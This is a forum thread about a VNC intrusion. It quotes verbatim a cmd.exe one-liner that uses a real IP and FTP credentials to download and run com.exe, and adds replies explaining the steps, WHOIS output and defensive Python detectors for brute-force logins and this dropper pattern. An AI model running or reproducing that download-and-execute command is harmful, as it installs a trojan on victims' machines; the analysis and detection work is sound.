TLDR: A friend gets remote controlled and strange text is entered into his run command.
My friend and coworker borrowed a laptop from work to use over this weekend. It has VNC (PC remote control software) on it that we use occasionally to make life easier.
He called me up from home just before I left work. Seems he was using the laptop, minding his own business, when all of a sudden the VNC icon goes dark (you are being controlled!) and his mouse starts moving.
He and I both thought it might be another friend from work pranking him...but he shouldn't have an easily tracked IP address when using it at home, right? Plus VNC was supposedly password protected on that machine.
This anonymous person opens a run command and types in the following:
cmd /c echo open 87.230.22.187/httpdocs/img/ 21 >> ik &echo user zf Z@z1humensk1 >> ik &echo binary >> ik &echo get com.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &com.exe &exit
Nothing obvious happens as a result of this. The VNC icon turns white again, my friend regains control and writes all this down and emails it to me.
I googled some of this info and - here is a weird thing - there is exactly one Google result. From just today.
Ok, so I am minding my own business and the browser freezes (mind you, was on Google.com), and spotlight gets the following entered into it:
echo open 87.230.22.187/https/img/ 21 >> ik &echo user zf Z@z1humensk1 >> ik &echo binary >> ik &echo get com.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &com.exe &exitecho You got owned
So, I know this is someone's lame attempt at a hack, but what gets me is how it has come into the system.
I have the normal firewall rules on and no unusual processes running. I was running through my WPA2 protected WIFI connection, but have jumped to hard wired for now and disabled the network for now.
I have not downloaded any questionable content from anywhere and stay updated. I went as far as to go in and install anti-virus on the Mac (even though some may consider it a moot point). Negative on the results. Of course, this sounds like a Windows virus. No other Windows systems were connected to the network at the time of this 'hack'.
Any ideas? Google returns ZERO results.
I'm really curious at this point. My work computer has Deep Freeze on it, which means any changes made to the computer at all are not remembered after a reboot - meaning I am pretty much safe from viruses and such. So I boldly type in the IP address into a browser to see what happens.
The site comes up Forbidden, denied access...but it wants to install an ActiveX control, something about "Microsoft Remote Data," and a strange vCard dialog pops up. And after a few seconds, maybe I'm misinterpreting the significance of this, but a Photoshop document I had minimized suddenly came to the front.
So I held in the power button and came home.
I really want to know what that command is supposed to do! Based on almost no knowledge at all, I am guessing that it's trying to pull com.exe off of some server and run it, and the second bit is authentication? I like how the Mac guy's version ends with "you got owned."
I'm going to go out on a limb here and say for the love of god don't type this in unless you really know what you're doing.
EDIT: Output from several lookup websites for that IP; apparently it's German.
Host name: lvps87-230-22-187.dedicated.hosteurope.de.
IP address: 87.230.22.187
Location: Berlin, GERMANY
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL
ReferralServer: whois://whois.ripe.net:43
NetRange: 87.0.0.0 - 87.255.255.255
CIDR: 87.0.0.0/8
NetName: 87-RIPE
NetHandle: NET-87-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: SUNIC.SUNET.SE
NameServer: TINNIE.ARIN.NET
NameServer: NS.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois
RegDate: 2004-04-01
Updated: 2004-04-06
# ARIN WHOIS database, last updated 2008-11-25 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html
% Note: This output has been filtered.
% To receive output for a database update, use the "-B" flag.
% Information related to '87.230.22.0 - 87.230.22.255'
inetnum: 87.230.22.0 - 87.230.22.255
remarks: INFRA-AW
netname: HE-DS-22-CGN2-NET
descr: Hosteurope GmbH
descr: koeln@hosteurope.de
country: DE
admin-c: HER4-RIPE
tech-c: HER
status: ASSIGNED PA
mnt-by: ONE2ONE-MNT
source: RIPE # Filtered
role: Host Europe Ripehandle
address: Hansestr. 109
address: 51149 Koeln
phone: +49 2203 1045 0
abuse-mailbox: net-abuse@hosteurope.de
admin-c: DART
admin-c: FLX
admin-c: WIRR
admin-c: SHAF
admin-c: HONK
tech-c: DART
tech-c: FLX
tech-c: WIRR
tech-c: SHAF
tech-c: HONK
nic-hdl: HER
mnt-by: ONE2ONE-MNT
source: RIPE # Filtered
person: Uwe Braun
address: Hansestr. 109
address: 51149 Koeln
phone: +49 2203 1045 7000
nic-hdl: HER4-RIPE
source: RIPE # Filtered
mnt-by: ONE2ONE-MNT
% Information related to '87.230.0.0/17AS20773'
route: 87.230.0.0/17
descr: DE-HER-87-230-SLASH-17
origin: AS20773
member-of: AS20773:RS-HOSTEUROPE
mnt-by: ONE2ONE-MNT
source: RIPE # Filtered
Posts
As a general rule of thumb you should never keep VNC open to the world. Even if it's password protected. If your password is simplistic they could have brute forced it. If the version of VNC is older it could have been exploited. Even if you use a complex password and an up to date version of VNC, straight (normal) VNC is unencrypted so your password is sent in the clear.
Of course. That wasn't really my concern, we can easily redo that laptop and disable VNC when people go on the road. It's strange though how the same thing happened on a Mac.
So what most likely happened is your friend took the laptop onto a network that was exposed to the outside world; the same thing most likely happened to the Mac kid. VNC is dangerous, and if you're running it the firewall on the local machine should only expose it to local (same subnet) machines, AND then the router should be set up with proper firewall rules.
I used to intern at a research lab where we ran our own servers. The second you expose a machine to the internet, bots start to hit it to see if they can get in. We had an FTP server, and the amount of failed login attempts was staggering.
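The two replies above make the same point from different angles: a VNC or FTP service that is reachable from the internet gets hammered with login attempts, and a weak password eventually falls to them. The point a defender wants to turn into a check is "many failures from one source in a short window, especially if followed by a success". The Python below is an added example, not code from this thread or from any VNC product: it reads authentication log lines in a constructed, assumed layout (`<date> <time> <service> auth-failed|auth-ok src=<ip>`), keeps a sliding window of failures per (service, source) pair, raises an alert when the window reaches a threshold, and marks the alert as higher severity if that same source later authenticates successfully. The log format, sample IPs and function names are all assumptions; real VNC and FTP daemons each log differently, so `LINE_RE` is the part to adapt.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, Iterable, List, Optional, Tuple

# Constructed sample log (assumed layout, documentation-range IPs). The first source
# fails five times in four seconds and then gets in; the second fails three times
# spread ten minutes apart, which is noise rather than a burst.
SAMPLE_LOG = """\
2008-11-25 19:10:01 vnc auth-failed src=203.0.113.7
2008-11-25 19:10:02 vnc auth-failed src=203.0.113.7
2008-11-25 19:10:02 vnc auth-failed src=203.0.113.7
2008-11-25 19:10:03 vnc auth-failed src=203.0.113.7
2008-11-25 19:10:04 vnc auth-failed src=203.0.113.7
2008-11-25 19:10:05 vnc auth-ok src=203.0.113.7
2008-11-25 19:10:30 ftp auth-failed src=198.51.100.9
2008-11-25 19:20:30 ftp auth-failed src=198.51.100.9
2008-11-25 19:30:30 ftp auth-failed src=198.51.100.9
2008-11-25 19:31:00 vnc auth-ok src=192.168.1.20
"""

# Assumed line layout: "<date> <time> <service> <auth-failed|auth-ok> src=<ip>"
LINE_RE = re.compile(r"^(\S+ \S+) (\w+) (auth-failed|auth-ok) src=(\S+)$")


def parse_line(line: str) -> Optional[Tuple[datetime, str, str, str]]:
    """Return (timestamp, service, event, source ip) or None for lines we don't understand."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
    return ts, m.group(2), m.group(3), m.group(4)


def find_bruteforce(lines: Iterable[str], threshold: int = 5,
                    window: timedelta = timedelta(seconds=60)) -> List[Dict[str, object]]:
    """Alert when one source racks up `threshold` failures against one service inside `window`."""
    recent: Dict[Tuple[str, str], Deque[datetime]] = defaultdict(deque)
    alerts: Dict[Tuple[str, str], Dict[str, object]] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, service, event, src = rec
        key = (service, src)
        q = recent[key]
        if event == "auth-failed":
            q.append(ts)
            # Drop failures that have aged out of the sliding window
            while q and ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold and key not in alerts:
                alerts[key] = {
                    "service": service,
                    "src": src,
                    "failures": len(q),
                    "first_seen": q[0].isoformat(),
                    "last_seen": ts.isoformat(),
                    # Set later if the same source then logs in: likely a guessed password
                    "success_after_burst": False,
                }
        elif event == "auth-ok" and key in alerts:
            alerts[key]["success_after_burst"] = True
    return list(alerts.values())


def failures_by_source(lines: Iterable[str]) -> Dict[Tuple[str, str], int]:
    """Plain failure counts per (service, source), the 'staggering' number in the reply above."""
    counts: Dict[Tuple[str, str], int] = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "auth-failed":
            counts[(rec[1], rec[3])] += 1
    return dict(counts)


if __name__ == "__main__":
    for alert in find_bruteforce(SAMPLE_LOG.splitlines()):
        print(alert)
    print(failures_by_source(SAMPLE_LOG.splitlines()))
```

The sliding window is what keeps the slow, spread-out FTP failures from alerting while the four-second VNC burst does; `success_after_burst` is the line worth paging on, because it means the guessing worked and the host should be treated as compromised rather than merely probed.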
Deploy an orbital nuke on that fucker.
Can trade TF2 items or whatever else you're interested in. PM me.
1) creates a file named "ik" containing the necessary commands to log into an FTP server and download a trojan
2) uses the "ik" file to log in and download the trojan
3) deletes the "ik" file
4) runs the trojan
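The four steps listed above are a fixed shape that shows up in a lot of Windows malware droppers of this era, and that shape can be recognised mechanically. The Python below is an added example, not code from this thread: it splits a cmd.exe one-liner on `&`, reconstructs what the `echo ... >> file` commands would have written into the FTP script, and reports whether the full pattern is present (script built, `ftp -s:` run on it, script deleted, downloaded file executed). The two sample command lines are the ones quoted in this thread with the FTP user and password replaced by placeholders; the function and field names are my own, and the strings are parsed only, never executed.

```python
import re
from typing import Dict, List, Optional

# Sample command lines copied from this thread (the Windows laptop one and the
# "Mac guy" variant). USER/PASS stand in for the credentials in the original;
# the detector never looks at them. These strings are parsed, never executed.
SAMPLE_CMDLINES = [
    "cmd /c echo open 87.230.22.187/httpdocs/img/ 21 >> ik &echo user USER PASS >> ik "
    "&echo binary >> ik &echo get com.exe >> ik &echo bye >> ik "
    "&ftp -n -v -s:ik &del ik &com.exe &exit",
    "echo open 87.230.22.187/https/img/ 21 >> ik &echo user USER PASS >> ik "
    "&echo binary >> ik &echo get com.exe >> ik &echo bye >> ik "
    "&ftp -n -v -s:ik &del ik &com.exe &exitecho You got owned",
]

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*>>?\s*(\S+)$", re.I)  # echo <text> >> <file>
FTP_RE = re.compile(r"^ftp\b.*?-s:(\S+)", re.I)              # ftp ... -s:<script>
DEL_RE = re.compile(r"^(?:del|erase)\s+(\S+)$", re.I)       # del <file>


def split_commands(cmdline: str) -> List[str]:
    """Split a cmd.exe one-liner into its '&'-chained commands, dropping a 'cmd /c' wrapper."""
    body = re.sub(r"^\s*cmd(?:\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    return [part.strip() for part in body.split("&") if part.strip()]


def analyze_ftp_dropper(cmdline: str) -> Dict[str, object]:
    """Reconstruct the echo-built FTP script and report the dropper indicators."""
    parts = split_commands(cmdline)

    # Step 1: lines appended to each file via 'echo ... >> file'
    script_lines: Dict[str, List[str]] = {}
    for p in parts:
        m = ECHO_RE.match(p)
        if m:
            script_lines.setdefault(m.group(2).lower(), []).append(m.group(1))

    # Step 2: which file is handed to ftp with -s: (the script it will replay)
    ftp_script: Optional[str] = None
    for p in parts:
        m = FTP_RE.match(p)
        if m:
            ftp_script = m.group(1).lower()

    lines = script_lines.get(ftp_script, []) if ftp_script else []
    host = port = None
    fetched: List[str] = []
    for l in lines:
        m = re.match(r"open\s+(\S+)(?:\s+(\d+))?", l, re.I)
        if m:
            host, port = m.group(1), m.group(2)
        m = re.match(r"get\s+(\S+)", l, re.I)
        if m:
            fetched.append(m.group(1).lower())

    # Step 3: is the script deleted afterwards (covering tracks)?
    deletes_script = False
    for p in parts:
        m = DEL_RE.match(p)
        if m and ftp_script and m.group(1).lower() == ftp_script:
            deletes_script = True

    # Step 4: is a downloaded file then run as its own command?
    executes_fetched = any(p.split()[0].lower() in fetched for p in parts)

    return {
        "ftp_script": ftp_script,
        "ftp_host": host,
        "ftp_port": port,
        "fetched_files": fetched,
        "deletes_script": deletes_script,
        "executes_fetched": executes_fetched,
        # Build script, replay it with ftp, then execute what it fetched
        "is_ftp_dropper": bool(ftp_script) and bool(fetched) and executes_fetched,
    }


def flag_cmdlines(cmdlines: List[str]) -> List[int]:
    """Indexes of the command lines that match the FTP-dropper pattern."""
    return [i for i, c in enumerate(cmdlines) if analyze_ftp_dropper(c)["is_ftp_dropper"]]


if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(analyze_ftp_dropper(c))
```

Run over process-creation or command-line telemetry, the `is_ftp_dropper` verdict is the actionable bit; `ftp_host` and `fetched_files` are what you would pass on to whoever blocks the address and hunts for the downloaded binary. The "Mac guy" variant, whose trailing `exitecho You got owned` is just a typo fused onto `exit`, still matches because the detector only cares about the four steps.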